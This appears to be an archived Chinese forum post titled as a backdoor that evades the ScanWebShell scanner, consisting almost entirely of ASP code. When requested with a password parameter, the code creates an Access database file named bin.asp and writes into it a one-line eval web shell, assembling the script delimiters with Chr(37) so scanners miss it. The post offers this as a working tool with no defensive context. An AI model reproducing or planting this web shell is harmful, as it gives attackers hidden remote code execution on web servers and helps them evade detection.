查看完整版本: 躲避ScanWebShell的一个后门

躲避ScanWebShell的一个后门

<%
pass="zs"
If request("bin")= pass then
shell = "bin.asp"
Connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath(shell)
set connad=server.createobject("adox.catalog")
connad.create connstr
Set conn=server.createobject("Adodb.Connection")
conn.open connstr
conn.execute("create table cmd(shell text)")
conn.execute("insert into cmd (shell) values (&#39;<"&Chr("37")&"e"&"val+request("""&pass&""")"&chr("37")&">&#39;)")
End If
%>